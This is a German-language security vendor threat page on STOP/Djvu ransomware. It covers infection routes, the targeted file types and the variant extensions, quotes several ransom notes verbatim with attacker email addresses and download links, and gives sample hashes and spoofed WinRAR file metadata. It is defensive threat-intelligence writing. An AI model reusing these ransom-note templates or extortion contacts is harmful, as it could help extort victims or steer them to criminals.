STOP Ransomware

PC-Sicherheitsforscher erhielten am 21. Februar 2018 Berichte über Ransomware-Angriffe mit einer Bedrohung namens STOP Ransomware. Die STOP Ransomware basiert auf einer Open-Source-Ransomware-Plattform und führt eine typische Version eines Verschlüsselungs-Ransomware-Angriffs aus. Die STOP-Ransomware wird über Spam-E-Mail-Nachrichten verbreitet, die beschädigte Dateianhänge enthalten. Diese Dateianhänge haben die Form von DOCX-Dateien mit eingebetteten Makroskripten, die die STOP-Ransomware herunterladen und auf dem Computer des Opfers installieren. Zu lernen, wie Sie Phishing-E-Mails erkennen und das Herunterladen von unerwünschten Dateianhängen vermeiden, ist eine der Möglichkeiten, diese Angriffe zu vermeiden.

So erkennen Sie eine STOP-Ransomware-Infektion

Sobald die STOP Ransomware auf dem Computer des Opfers installiert ist, durchsucht die STOP Ransomware die Laufwerke des Opfers nach einer Vielzahl von Dateitypen und sucht im Allgemeinen nach benutzergenerierten Dateien wie Bildern, Mediendateien und zahlreichen anderen Dokumenttypen. Die STOP-Ransomware scheint auch für das Ziel von Webservern entwickelt worden zu sein, da sie explizit nach Datenbankdateien und ähnlichen Dateitypen sucht, die normalerweise in diesen Computern enthalten sind. Zu den Dateitypen, nach denen die STOP Ransomware sucht und die sie bei ihrem Angriff angreift, gehören:

.3dm, .3g2, .3gp, .7zip, .aaf, .accdb, .aep, .aepx, .aet, .ai, .aif, .as, .as3, .asf, .asp, .asx, .avi , .bmp, .c, .class, .cpp, .cs, .csv, .dat, .db, .dbf, .doc, .docb, .docm, .docx, .dot, .dotm, .dotx, . dwg, .dxf, .efx, .eps, .fla, .flv, .gif, .h, .idml, .iff, .indb, .indd, .indl, .indt, .inx, .jar, .java, .jpeg, .jpg, .js, .m3u, .m3u8, .m4u, .max, .mdb, .mid, .mkv, .mov, .mp3, .mp4, .mpa, .mpeg, .mpg, .msg , .pdb, .pdf, .php, .plb, .pmd, .png, .pot, .potm, .potx, .ppam, .ppj, .pps, .ppsm, .ppsx, .ppt, .pptm, . pptx, .prel, .prproj, .ps, .psd, .py, .ra, .rar, .raw, .rb, .rtf, .sdf, .sdf, .ses, .sldm, .sldx, .sql, .svg, .swf, .tif, .txt, .vcf, .vob, .wav, .wma, .wmv, .wpd, .wps, .xla, .xlam, .xll, .xlm, .xls, .xlsb , .xlsm, .xlsx, .xlt, .xltm, .xltx, .xlw, .xml, .xqx, .xqx, .zip.

Diese Woche in Malware Ep 10: STOP & Zorab Ransomware nutzt Opfer mit gefälschtem Decryptor aus

Die STOP Ransomware verwendet einen starken Verschlüsselungsalgorithmus, um jede der Dateien des Opfers unzugänglich zu machen. Der STOP Ransomware-Angriff fügt den verschlüsselten Dateien die Dateierweiterung „.SUSPENDED" hinzu, um die betroffenen Dateien zu markieren.

Der Lösegeld-Hinweis der STOP-Ransomware

Die STOP Ransomware fordert eine Lösegeldzahlung, indem sie eine Lösegeldforderung an den Computer des Opfers sendet. Diese Lösegeldforderung wird in einer Textdatei angezeigt, die auf dem Desktop des Opfers abgelegt wird. Die Datei mit dem Namen '!!! YourDataRestore !!!.txt,' enthält die Meldung:

»Alle Ihre wichtigen Dateien wurden auf diesem PC verschlüsselt.
Alle Dateien mit der Erweiterung .STOP sind verschlüsselt. Die Verschlüsselung wurde unter Verwendung des einzigartigen privaten Schlüssels RSA-1024 erzeugt, der für diesen Computer generiert wurde.
Um Ihre Dateien zu entschlüsseln, müssen Sie einen privaten Schlüssel + eine Entschlüsselungssoftware erhalten.
Um den privaten Schlüssel abzurufen und die Software zu entschlüsseln, müssen Sie uns per E-Mail stopfilesrestore@bitmessage.ch kontaktieren. Senden Sie uns eine E-Mail mit Ihrer Datei !!!YourDataRestore!!!.txt und warten Sie auf weitere Anweisungen.
Damit Sie sicher sein können, dass wir Ihre Dateien entschlüsseln können - senden Sie uns ein 1-3 oder nicht sehr großes verschlüsseltes Original KOSTENLOS zurück.
Preis für die Entschlüsselung $600, wenn Sie uns in den ersten 72 Stunden kontaktieren.
Ihre persönliche ID:
[Zufällige Zeichen]
E-Mail-Adresse zur Kontaktaufnahme:
stopfilesrestoret@bitmessage.ch
Reservieren Sie eine E-Mail-Adresse, um uns zu kontaktieren:
stopfilesrestore@india.com'

Die Verantwortlichen für die STOP Ransomware fordern eine Lösegeldzahlung von 600 USD, die mit Bitcoin an eine bestimmte Bitcoin-Wallet-Adresse und innerhalb von 72 Stunden zu zahlen ist. Die Kontaktaufnahme mit diesen Personen oder die Zahlung des STOP Ransomware-Lösegeldes ist jedoch möglicherweise nicht die beste Lösung.

Schutz Ihrer Daten vor STOP Ransomware und anderen Ransomware-Trojanern

Der beste Schutz gegen die STOP Ransomware und andere Ransomware-Trojaner sind Datei-Backups. Computerbenutzer, die über Sicherungskopien ihrer Dateien verfügen, können diese Dateien nach einem Angriff problemlos wiederherstellen, ohne das Lösegeld zahlen zu müssen. Ein empfohlenes Sicherheitsprogramm kann auch verhindern, dass die STOP Ransomware überhaupt installiert wird.

Update 6. Dezember 2018 — 'helpshadow@india.com' Ransomware

Die Ransomware „helpshadow@india.com" wird als vergleichsweise kleines Update des Codes kategorisiert, der die Marke STOP Ransomware trägt. Die Threat-Autoren scheinen nicht genügend Zeit für den Feinschliff der neuen Variante aufgewendet zu haben, da sie eine niedrige Infektionsrate erzielte. Die Ransomware „helpshadow@india.com" wurde von AV-Anbietern schnell aufgegriffen, und über wichtige soziale Plattformen und Cybersicherheitsberichte wurden Warnungen ausgegeben. Leider gibt es noch keine Möglichkeit zur kostenlosen Entschlüsselung. Benutzer werden normalerweise durch ein beschädigtes Dokument kompromittiert, das per E-Mail empfangen wird. Es ist bekannt, dass die Bedrohung die von Windows erstellten Schattenvolumen-Schnappschüsse löscht und die '.shadow'-Erweiterung an die verschlüsselten Objekte anhängt. Beispielsweise wird „C12-H22-O11.pptx" in „C12-H22-O11.pptx.shadow" umbenannt und eine Lösegeldforderung namens „!readme.txt" wird auf dem Desktop angezeigt. Die Ransomware 'helpshadow@india.com' zeigt den infizierten Benutzern wahrscheinlich die folgende Meldung an:

'ALLE DATEIEN SIND VERSCHLÜSSELT
Keine Sorge, Sie können alle Ihre Dateien zurückgeben!
Alle Ihre Dateien, Dokumente, Fotos, Datenbanken und andere wichtige werden mit der stärksten Verschlüsselung und einem einzigartigen Schlüssel verschlüsselt.
Die einzige Methode zum Wiederherstellen von Dateien besteht darin, ein Entschlüsselungstool und einen eindeutigen Schlüssel für Sie zu erwerben.
Diese Software wird alle Ihre verschlüsselten Dateien entschlüsseln.
Welche Garantien geben wir Ihnen?
Sie können eine Ihrer verschlüsselten Dateien von Ihrem PC aus senden und wir entschlüsseln sie kostenlos.
Aber wir können nur 1 Datei kostenlos entschlüsseln. Datei darf keine wertvollen Informationen enthalten
Versuchen Sie nicht, Entschlüsselungstools von Drittanbietern zu verwenden, da dies Ihre Dateien zerstört.
Rabatt 50% verfügbar, wenn Sie uns in den ersten 72 Stunden kontaktieren.
Um diese Software zu erhalten, müssen Sie auf unsere E-Mail schreiben:
helpshadow@india.com
Reservieren Sie eine E-Mail-Adresse, um uns zu kontaktieren:
helpshadow@firemail.cc
Ihre persönliche ID:
[zufällige Zeichen]'

Der oben gezeigte Text wird von Varianten verwendet, die vor der Ransomware „helpshadow@india.com" veröffentlicht wurden, und die einzige erwähnenswerte Änderung ist die neue E-Mail-Konfiguration. Die Ransomware „helpshadow@india.com" ist nach einem der E-Mail-Kontakte benannt, und der andere verweist die Benutzer auf denselben Benutzernamen, jedoch auf einer anderen E-Mail-Plattform – „helpshadow@firemail.cc". Beide E-Mail-Konten werden wahrscheinlich gekündigt, bis dieser Artikel Sie erreicht. Die Chancen, denjenigen zu erwischen, der hinter der Ransomware von helpshadow@india.com steckt, sind nicht groß, wenn man bedenkt, dass die Ransomware-Betreiber Proxys, VPN-Dienste und das TOR-Netzwerk verwenden, um ihre Steuergeräte zu verbergen. Daher müssen die Benutzer bei der Verteidigung ihrer Daten proaktiv sein. Schritt Nummer eins – Installieren Sie ein Backup-Programm auf Ihrem System; Schritt Nummer zwei – Öffnen Sie keine Dateien von unbekannten Absendern. Denken Sie daran, Ihre Datensicherungen auf einen Wechselspeicher oder einen Datei-Hosting-Dienst zu exportieren.

Update 13. Dezember 2018 – '.djvu-Dateierweiterung' Ransomware

Die '.djvu File Extension' Ransomware ist eine neue Variante der STOP Ransomware, die am 12. Dezember 2018 gemeldet wurde. Computersicherheitsforscher kategorisieren die '.djvu File Extension' Ransomware als kleine Aktualisierung der früheren Versionen der STOP Ransomware und Warnung, dass die Bedrohung immer noch hauptsächlich über Spam-E-Mails verbreitet wird. Die Bedrohungsakteure haben Makro-aktivierte Dokumente und gefälschte PDFs verwendet, um die Benutzer dazu zu bringen, ihr Programm im Hintergrund zu installieren. Die Angriffe mit der Ransomware '.djvu File Extension' sind fast die gleichen wie bei der ersten Infektionswelle im Februar 2018. Die Bedrohung löscht die Snapshots und Maps von Shadow Volume, die mit Speicherlaufwerken verbunden sind, bevor sie die Daten des Benutzers verschlüsselt. Die neue Variante unterstützt eine andere Dateierweiterung und die Lösegeldforderung wurde leicht geändert. Wie der Name schon sagt, erhalten die Dateien das Suffix '.djvu' und etwas wie 'Jonne-Kaiho.mp3' wird in 'Jonne-Kaiho.mp3.djvu' umbenannt. Die Lösegeldforderung ist auf dem Desktop als '_openme.txt' zu sehen und lautet:

'ALLE DATEIEN SIND VERSCHLÜSSELT
Keine Sorge, Sie können alle Ihre Dateien zurückgeben!
Alle Ihre Dateien, Dokumente, Fotos, Datenbanken und andere wichtige werden mit der stärksten Verschlüsselung und einem einzigartigen Schlüssel verschlüsselt.
Die einzige Methode zum Wiederherstellen von Dateien besteht darin, ein Entschlüsselungstool und einen eindeutigen Schlüssel für Sie zu erwerben.
Diese Software wird alle Ihre verschlüsselten Dateien entschlüsseln.
Welche Garantien geben wir Ihnen?
Sie können eine Ihrer verschlüsselten Dateien von Ihrem PC aus senden und wir entschlüsseln sie kostenlos.
Aber wir können nur 1 Datei kostenlos entschlüsseln. Datei darf keine wertvollen Informationen enthalten
Versuchen Sie nicht, Entschlüsselungstools von Drittanbietern zu verwenden, da dies Ihre Dateien zerstört.
Rabatt 50% verfügbar, wenn Sie uns in den ersten 72 Stunden kontaktieren.
Um diese Software zu erhalten, müssen Sie auf unsere E-Mail schreiben:
helpshadow@india.com

Reservieren Sie eine E-Mail-Adresse, um uns zu kontaktieren:
helpshadow@firemail.cc

Ihre persönliche ID:
[zufällige Zeichen]'

Die Bedrohungsautoren verwenden weiterhin die E-Mail-Konten „helpshadow@india.com" und „helpshadow@firemail.cc" für ihre Ransomware-Kampagne. Vertrauen Sie dem STOP Ransomware-Team nicht und vermeiden Sie die Verwendung des oben genannten gefälschten 50%-Rabatts. Die hier diskutierten Bedrohungsakteure sind nicht für ihre Nachsicht bekannt. PC-Benutzer sollten die Ransomware '.djvu File Extension' mit einem vertrauenswürdigen Anti-Malware-Instrument entfernen. Verwenden Sie am besten Backup-Images und Backup-Dienste, um Ihre Daten wiederherzustellen.

Update 11. Januar 2019 — '.tfude File Extension' Ransomware

Die '.tfude File Extension' Ransomware ist eine Version der STOP Ransomware, die am 11. Januar 2019 herauskam. Die Bedrohung wird als eine Version klassifiziert, die im Vergleich zur ursprünglichen Cyberbedrohung nur minimale Änderungen aufweist. Die Ransomware '.tfude File Extension' ist nach der einzigen bemerkenswerten Änderung ihres beschädigten Codes benannt. Der Trojaner ist so konfiguriert, dass er die Dateierweiterung „.tfude" an verschlüsselte Daten anhängt. Die Ransomware '.tfude File Extension' verwendet weiterhin Standard-Verschlüsselungstechnologien und sichere Verbindungen zu den Command-Servern, die verhindern, dass Sicherheitsspezialisten kompromittierten Benutzern kostenlose Entschlüsselung anbieten.

Die vorliegende Krypto-Bedrohung verwendet Verschlüsselungstechnologien, die Regierungsbehörden und Unternehmen wie Google Inc. einsetzen, um die Datenübertragung zu sichern. Die verschlüsselten Dateien werden im Windows-Explorer als generische weiße Symbole angezeigt und die vom Benutzer installierten Programme bleiben funktionsfähig. Bestimmte Datenbankmanager funktionieren jedoch möglicherweise nicht ordnungsgemäß, da die Bedrohung gängige Datenbankformate codiert. Beispielsweise wird "Recent sales.pdb" in "Recent sales.pdb.tfude" umbenannt. Die Lösegeldforderung wird in den Notepad aus der Datei '_openme.txt' geladen, die sich auf dem Desktop befindet. Die Ransomware „.tfude File Extension" bietet die gleiche Nachricht wie der ursprüngliche Trojaner, aber diesmal verwenden die Bedrohungsakteure das E-Mail-Konto „pdfhelp@firemail.cc", um Benutzer zu erreichen. Den Benutzern steht kein kostenloser Entschlüsseler zur Verfügung, und Sie müssen zur Wiederherstellung Datensicherungen verwenden. Sie müssen die infizierten Geräte bereinigen, indem Sie einen vollständigen Systemscan mit einem seriösen Anti-Malware-Instrument durchführen.

Update 23. Januar 2019 — 'pausa@bitmessage.ch' Ransomware

Die 'pausa@bitmessage.ch' Ransomware ist eine Datei-Encoder-Malware, die mit dem STOP Ransomware Builder erstellt wird. Die Ransomware 'pausa@bitmessage.ch' wurde in der ersten Maiwoche 2018 über Spam-E-Mails an PC-Benutzer freigegeben. Die Ransomware 'pausa@bitmessage.ch' wird als generischer Verschlüsselungstrojaner wahrgenommen, der Daten auf infizierten Computern überschreibt und Datenträger löscht Snapshots, um die Wiederherstellung zu verhindern. Die 'pausa@bitmessage.ch' Ransomware ist dafür bekannt, dieselben Verschlüsselungstechnologien wie andere erfolgreiche Ransomware wie Cerber und Dharma zu verwenden, um nur einige zu nennen. Die Ransomware 'pausa@bitmessage.ch' ist so programmiert, dass sie vom Temp-Ordner unter dem AppData-Verzeichnis ausgeführt wird und eine sichere AES-256-Verschlüsselung auf Dokumente, Videos, Musik, Datenbanken und E-Books anwendet. Verschlüsselte Daten erhalten die Erweiterung '.PAUSA' und etwas wie 'Hartmann-Save me.mp3' wird in 'Hartmann-Save me.mp3.pausa' umbenannt. Die Lösegeldbenachrichtigung wird als '!!RESTORE!!!.txt' auf dem Desktop des Benutzers gespeichert und lautet:

»Alle Ihre wichtigen Dateien wurden auf diesem PC verschlüsselt.
Alle Dateien mit der Erweiterung .PAUSA sind verschlüsselt.
Die Verschlüsselung wurde unter Verwendung des einzigartigen privaten Schlüssels RSA-1024 erzeugt, der für diesen Computer generiert wurde.
Um Ihre Dateien zu entschlüsseln, müssen Sie einen privaten Schlüssel + eine Entschlüsselungssoftware erhalten.
Um den privaten Schlüssel abzurufen und die Software zu entschlüsseln, müssen Sie uns per E-Mail an pausa@bitmessage.ch kontaktieren. Senden Sie uns eine E-Mail mit Ihrer Datei !!!RESTORE!!!.txt und warten Sie auf weitere Anweisungen.
Damit Sie sicher sein können, dass wir Ihre Dateien entschlüsseln können - senden Sie uns eine 1-3 beliebige nicht sehr große verschlüsselte Dateien und wir senden sie Ihnen im Original KOSTENLOS zurück.
Preis für die Entschlüsselung $600, wenn Sie uns in den ersten 72 Stunden kontaktieren.
Ihre persönliche ID:
[zufällige Zeichen]
E-Mail-Adresse zur Kontaktaufnahme:
pausa@bitmessage.ch
Reservieren Sie eine E-Mail-Adresse, um uns zu kontaktieren:
pausa@india.com'

Wir empfehlen Ihnen, Verhandlungen mit den Bedrohungsakteuren über die E-Mail-Konten „pausa@bitmessage.ch" und „pausa@india.com" zu vermeiden. Es ist sicherer, Datensicherungen zu starten und Ihr System mit Hilfe eines seriösen Anti-Malware-Tools zu bereinigen. Selbst wenn Sie das absurde Lösegeld von 600 US-Dollar zahlen, gibt es keine Garantie, dass Sie einen Entschlüsseler erhalten. PC-Benutzern wird empfohlen, mindestens zweimal im Monat Datensicherungen zu erstellen und Spam-Nachrichten zu ignorieren, die zu einer Sicherheitsverletzung führen können. AV-Unternehmen unterstützen Erkennungsregeln für die Ransomware 'pausa@bitmessage.ch', aber zum Zeitpunkt des Schreibens ist kein kostenloser Entschlüsseler verfügbar.

Update 23. Januar 2019 — 'waiting@bitmessage.ch' Ransomware

Die 'waiting@bitmessage.ch' Ransomware ist ein Verschlüsselungstrojaner, der auf der STOP Ransomware basiert. Die Ransomware 'waiting@bitmessage.ch' wurde am 18. April 2018 von kompromittierten Benutzern gemeldet und scheint über beschädigte Microsoft Word-Dokumente in Computer einzudringen. Die Ransomware 'waiting@bitmessage.ch' wird aufgezeichnet, um Fotos, Audio, Video und Text auf den infizierten Computern zu verschlüsseln. Leider haben die Malware-Autoren einen Befehl hinzugefügt, um die Volume-Snapshots zu löschen, die Windows zum Schutz Ihrer Daten erstellt. Der Trojaner überschreibt gezielte Daten mit Dateien, die die Erweiterung „.WAITING" tragen und nicht mit Software auf Ihrem System geöffnet werden können. Beispielsweise wird „Hartmann-Like a River.mp3" in „Hartmann-Like a River.mp3.waiting" umbenannt und eine Lösegeldforderung wird auf Ihrem Desktop abgelegt. Die 'waiting@bitmessage.ch' Ransomware schreibt '!!!INFO_RESTORE!!!.txt' auf den Desktop und zeigt folgenden Text an:

»Alle Ihre wichtigen Dateien wurden auf diesem PC verschlüsselt.
Alle Dateien mit der Erweiterung .WAITING sind verschlüsselt.
Die Verschlüsselung wurde unter Verwendung des einzigartigen privaten Schlüssels RSA-1024 erzeugt, der für diesen Computer generiert wurde.
Um Ihre Dateien zu entschlüsseln, müssen Sie einen privaten Schlüssel + eine Entschlüsselungssoftware erhalten.
Um den privaten Schlüssel abzurufen und die Software zu entschlüsseln, müssen Sie uns per E-Mail wait@bitmessage.ch kontaktieren. Senden Sie uns eine E-Mail mit Ihrer Datei !!!INFO_RESTORE!!!.txt und warten Sie auf weitere Anweisungen.
Damit Sie sicher sein können, dass wir Ihre Dateien entschlüsseln können - senden Sie uns eine 1-3 beliebige nicht sehr große verschlüsselte Dateien und wir senden sie Ihnen im Original KOSTENLOS zurück.
Preis für die Entschlüsselung $600, wenn Sie uns in den ersten 72 Stunden kontaktieren.
Ihre persönliche ID:
[zufällige Zeichen]
E-Mail-Adresse zur Kontaktaufnahme:
wait@bitmessage.ch
Reservieren Sie eine E-Mail-Adresse, um uns zu kontaktieren:
wait@india.com'

Die Malware stört Backup-Tools von Drittanbietern nicht, und Sie sollten in der Lage sein, Datensicherungen zu starten. Es wird empfohlen, Interaktionen mit den Bedrohungsakteuren über die E-Mail-Adressen 'waiting@bitmessage.ch' und 'waiting@india.com' zu vermeiden. Sie könnten daran interessiert sein, File-Hosting-Dienste zu erkunden, wenn Sie Ihre Datensicherungen gegen über das Netzwerk übertragene Cyber-Bedrohungen und die meisten Ransomware-Varianten wie die 'waiting@bitmessage.ch' Ransomware schützen möchten.

Update 25. ^November 2019 - .zobm und .rote Extensions

Sicherheitsforscher stießen am 24. und 25. November 2019 auf einige neue Varianten der STOP-Ransomware. Die Ransomware-Varianten fügten die verschlüsselten Dateien mit den Erweiterungen .zobm und .rote an, hatten jedoch einen identischen Lösegeldschein namens _readme.txt. Die E-Mails, über die die Bedrohungsakteure erreicht werden konnten, waren ebenfalls dieselben – datarestorehelp@firemail.cc und datahelp@iran.ir.

BEACHTUNG!
Keine Sorge, Sie können alle Ihre Dateien zurückgeben!
Alle Ihre Dateien wie Fotos, Datenbanken, Dokumente und andere wichtige werden mit der stärksten Verschlüsselung und einem einzigartigen Schlüssel verschlüsselt.
Die einzige Methode zum Wiederherstellen von Dateien besteht darin, ein Entschlüsselungstool und einen eindeutigen Schlüssel für Sie zu erwerben.
Diese Software wird alle Ihre verschlüsselten Dateien entschlüsseln.
Welche Garantien haben Sie?
Sie können eine Ihrer verschlüsselten Dateien von Ihrem PC aus senden und wir entschlüsseln sie kostenlos.
Aber wir können nur 1 Datei kostenlos entschlüsseln. Die Datei darf keine wertvollen Informationen enthalten.
Sie können das Video-Übersichts-Entschlüsselungstool abrufen und ansehen:
https://we.tl/t-4NWUGZxdHc
Der Preis für den privaten Schlüssel und die Entschlüsselungssoftware beträgt 980 US-Dollar.
Rabatt von 50% verfügbar, wenn Sie uns in den ersten 72 Stunden kontaktieren, der Preis für Sie beträgt 490 USD.
Bitte beachten Sie, dass Sie Ihre Daten niemals ohne Zahlung wiederherstellen werden.
Überprüfen Sie Ihren E-Mail-Ordner "Spam" oder "Junk", wenn Sie länger als 6 Stunden keine Antwort erhalten.

Um diese Software zu erhalten, müssen Sie auf unsere E-Mail schreiben:
datarestorehelp@firemail.cc
Reservieren Sie eine E-Mail-Adresse, um uns zu kontaktieren:
datahelp@iran.ir
Ihre persönliche ID:
[zufällige Zeichen]

STOPP Ransomware im Jahr 2019 und darüber hinaus

Später im Jahr 2019 wurde die STOP-Ransomware immer noch verwendet und neue Angriffsvektoren wurden getestet. Die STOP-Ransomware erschien in Paketen mit anderen Formen von Malware, hauptsächlich Adware, die Sie auf Websites finden können, die behaupten, gecrackte ausführbare Dateien für Spiele und Software zu hosten. Auf diese Weise entpuppten sich viele der neuen Opfer der Ransomware als hoffnungsvolle Softwarepiraten, die mehr bekamen, als sie erwartet hatten.

Es gibt auch Hinweise darauf, dass die STOP-Ransomware Trojaner installiert, die Passwörter stehlen, die in der Lage sind, verschiedene Anmeldeinformationen abzukratzen.

Die Ransomware erweiterte auch die lange Liste der von ihr verwendeten verschlüsselten Dateierweiterungen. Dateien, die von der STOP-Ransomware verschlüsselt wurden, erhielten jetzt die Erweiterungen .rumba und .tro. Bis jetzt hat sich kaum etwas geändert - die Lösegeldforderung wurde immer noch in einer Datei namens "_openme.txt" gefunden, aber die Lösegeldsumme wurde auf 980 US-Dollar erhöht, mit einer Reduzierung auf 490 US-Dollar, wenn das Opfer innerhalb der ersten 72 Stunden nach der Infektion zahlt .

Update 24. März 2020 – Neue Varianten

Die Bedrohungsakteure hinter der STOP Ransomware haben 2020 genauso unermüdlich wie 2019 gearbeitet, mit neuen Varianten, die die Dateien der Opfer verschlüsseln und mit einer Vielzahl neuer Erweiterungen versehen. Zu den neuen Erweiterungen der STOP-Ransomware gehören .piny, .redl, .rooe, mmnn, .ooss, .rezm, .lokd und .foop.

Ein Beispiel für eine Lösegeldforderung, die mit der .lokd-Variante geliefert wurde, enthielt den folgenden Text:

BEACHTUNG!

Keine Sorge, Sie können alle Ihre Dateien zurückgeben!
Alle Ihre Dateien wie Fotos, Datenbanken, Dokumente und andere wichtige werden mit der stärksten Verschlüsselung und einem einzigartigen Schlüssel verschlüsselt.
Die einzige Methode zum Wiederherstellen von Dateien besteht darin, ein Entschlüsselungstool und einen eindeutigen Schlüssel für Sie zu erwerben.
Diese Software wird alle Ihre verschlüsselten Dateien entschlüsseln.
Welche Garantien haben Sie?
Sie können eine Ihrer verschlüsselten Dateien von Ihrem PC aus senden und wir entschlüsseln sie kostenlos.
Aber wir können nur 1 Datei kostenlos entschlüsseln. Die Datei darf keine wertvollen Informationen enthalten.
Sie können das Video-Übersichts-Entschlüsselungstool abrufen und ansehen:
https://we.tl/t7m8Wr997Sf
Der Preis für den privaten Schlüssel und die Entschlüsselungssoftware beträgt 980 US-Dollar.
Rabatt von 50% verfügbar, wenn Sie uns in den ersten 72 Stunden kontaktieren, der Preis für Sie beträgt 490 USD.
Bitte beachten Sie, dass Sie Ihre Daten niemals ohne Zahlung wiederherstellen werden.
Überprüfen Sie Ihren E-Mail-Ordner ''Spam'' oder ''Junk'', wenn Sie länger als 6 Stunden keine Antwort erhalten.

Um diese Software zu erhalten, müssen Sie auf unsere E-Mail schreiben:
helpdatarestore@firemail.cc
Reservieren Sie eine E-Mail-Adresse, um uns zu kontaktieren:
helpmanager@mail.ch
Ihre persönliche ID:
[zufällige Zeichen]

Andere E-Mails, die die Bedrohungsakteure mit diesen neuen Varianten verwendet haben, sind helpmanager@iran.ir und helpmanager@firemail.cc.

SpyHunter erkennt und entfernt STOP Ransomware

STOP Ransomware Screenshots

Analysebericht

Allgemeine Information

Family Name:	STOP/DJVU Ransomware
Signature status:	No Signature

Known Samples

i

Known Samples

This section lists other file samples believed to be associated with this family.

MD5: def8a7bfe5fe47d95a95085d8dbc7a53 SHA1: 7182d4b2f55a560d83edf0824e119f71fa8422b6 SHA256: B83855EA63E7F28396099A5B6E877BE537E78E4A50DF720262461A1D13B02192 Dateigröße: 6.29 MB, 6292105 bytes

MD5: a6b8c0cb178c31dd347554c3e5a0d5f8 SHA1: 91864f269d696ee80869cfeb3c9a204f8031a3bb SHA256: 4FFB8E9ADF508662B5E51CBEC75B2E07CE1CBBFAAB873F72EDC7BAC385421E2C Dateigröße: 3.47 MB, 3471869 bytes

MD5: 2336c9624d9a44c393d354206226f508 SHA1: ea7edc388ad62990f52b9ed40df26d20f4e20190 SHA256: CE48ED04C92143B7E91F9665DD9337B2EE0B9CC1B5AEE534D26C09E084F8ABB0 Dateigröße: 1.36 MB, 1359918 bytes

MD5: 42f32aa699bc45a3638ddeb325ebebc1 SHA1: 508cea3ba2bf04cc6851295f92bf0e752071f6b8 SHA256: 16532B38591B713395C288B11610494BCC4C4537BE492D43C54D66FEB7B95FA4 Dateigröße: 1.33 MB, 1328186 bytes

MD5: 2391d41548b6432191f73edefa273928 SHA1: 620b714f84955aa7fb9a2f2cd528daa1621e18af SHA256: 4D1EFAA3477B0B8D84025F3F0109E97ABA7CEB37F174B9DC79B7966CBB430959 Dateigröße: 3.36 MB, 3357556 bytes

Show More

MD5: 710c3a1beb616d4aa7d5ed9a7f8848e4 SHA1: 326da9ddc0ea840e83f31fbf1f3377a06c911fe5 SHA256: 051DAB5E5247E25D6EB059A574383FB1EC99A5A4AAF9AA3694240FE25FA260AB Dateigröße: 1.36 MB, 1364106 bytes

MD5: 601b120a6f39f72847b2f581a3d5f158 SHA1: 0cc5781c1cfe6c5d034bd098229773e80e083732 SHA256: BEC2BFF460615A35D4EA35BF25E9F89337E35E73441A4AC07562CE8E89BED818 Dateigröße: 4.86 MB, 4858569 bytes

MD5: a7b76a49f289081961f8f3824f0b62ca SHA1: 6908790199785be7fc6c4eeb1fe426ee1b66cc0b SHA256: 1A721E054386833AEBBF94C75871143376897E92C4A48278DDE95E6987634F45 Dateigröße: 1.41 MB, 1406899 bytes

MD5: 9f37930d62a1e08f68aa0a72472e7a55 SHA1: 27706b3ff639e5dfa264a823dbe9229cf34ae153 SHA256: 29039902EEA4EE24C4C6368AA9B1D7F86BEC65ADA3ABDB0B92C1FEF311ACD31F Dateigröße: 600.12 KB, 600124 bytes

MD5: 7a18839fe61e9cde0e8fea3100acfb2b SHA1: 9476c97a73e027016e9f6f2f20c2fb19264cd837 SHA256: 0271095F0AD5C6F26C9738ED5636E751B8868C1AE3B08D5D8C5218121D9FEEAF Dateigröße: 316.83 KB, 316832 bytes

MD5: fe17d0f940a226e80cc18b4399da4ffc SHA1: cc1bd23b0c7ff5da8ff996717b3969b7ebb9c67b SHA256: D869A00DFA1BE0DF6D08BB72B790894D1861834D5E350F5DD54A70C3711BA713 Dateigröße: 1.36 MB, 1363661 bytes

Windows Portable Executable Attributes

i

Windows Portable Executable Attributes

This section lists file attributes found within family samples. These attributes are extracted from the files’ Windows PE (Portable Executable) specification and various system flags. Portable Executable Attributes give malware researchers insight into a file’s functionality, executable details, platform and runtime environment.

• File doesn't have "Rich" header
• File doesn't have debug information
• File doesn't have exports table
• File doesn't have relocations information
• File doesn't have security information
• File has exports table
• File has TLS information
• File is 32-bit executable
• File is 64-bit executable
• File is either console or GUI application

Show More

• File is GUI application (IMAGE_SUBSYSTEM_WINDOWS_GUI)
• File is Native application (NOT .NET application)
• File is not packed
• IMAGE_FILE_DLL is not set inside PE header (Executable)
• IMAGE_FILE_EXECUTABLE_IMAGE is set inside PE header (Executable Image)

File Icons

i

File Icons

This section displays icon resources found within family samples. Malware often replicates icons commonly associated with legitimate software to mislead users into believing the malware is safe.

Windows PE Version Information

i

Windows PE Version Information

This section displays values and attributes that have been set in the Windows file version information data structure for samples within this family. To mislead users, malware actors often add fake version information mimicking legitimate software.

Name	Wert
Assembly Version	1.4.1.0
Comments	This installation was built with Inno Setup.
Company Name	Alexander Roshal TrayToolbar WinTools Software Engineering, Ltd.
File Description	Archiwizer WinRAR Gestione archivi WinRAR RAM Saver Professional TrayToolbar WinRAR 5.60 64 Bit Setup WinRAR Installer
File Version	26.3.1 26.2.1 26.0.1 25.7.1 25.4.1 6.20.2 6.2.0 1.4.1.0 1.3.0.0 1.00
Internal Name	TJprojMain TrayToolbar.dll WinRAR
Legal Copyright	Copyright © Alexander Roshal 1993-2021 Copyright © Alexander Roshal 1993-2022 Copyright © Alexander Roshal 1993-2025 © Brontech, LLC
Original Filename	TJprojMain.exe TrayToolbar.dll WinRAR.exe
Product Name	Project1 RAM Saver 25.4.1 Professional RAM Saver 25.7.1 Professional RAM Saver 26.0.1 Professional RAM Saver 26.2.1 Professional RAM Saver 26.3.1 Professional TrayToolbar WinRAR WinRAR 5.60 64 Bit WinRAR Installer
Product Version	26.3.1 26.2.1 26.0.1 25.7.1 25.4.1 6.20.2 6.2.0 5.60 1.4.1+80dec33e25323db7125ddec35b475aa881292801 1.4.0 Show More 1.00

Digital Signatures

i

Digital Signatures

This section lists digital signatures that are attached to samples within this family. When analyzing and verifying digital signatures, it is important to confirm that the signature’s root authority is a well-known and trustworthy entity and that the status of the signature is good. Malware is often signed with non-trustworthy “Self Signed” digital signatures (which can be easily created by a malware author with no verification). Malware may also be signed by legitimate signatures that have an invalid status, and by signatures from questionable root authorities with fake or misleading “Signer” names.

Signer	Root	Status
win.rar GmbH	DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1	Self Signed
win.rar GmbH	GlobalSign CodeSigning CA - SHA256 - G3	Hash Mismatch

File Traits

• .NET
• 2+ executable sections
• big overlay
• HighEntropy
• Inno
• InnoSetup Installer
• Installer Manifest
• Installer Version
• MZ (In Overlay)
• No Version Info

Show More

• Nullsoft Installer
• RAR (In Overlay)
• RARinO
• Run
• SusSec
• vb6
• WinRAR SFX
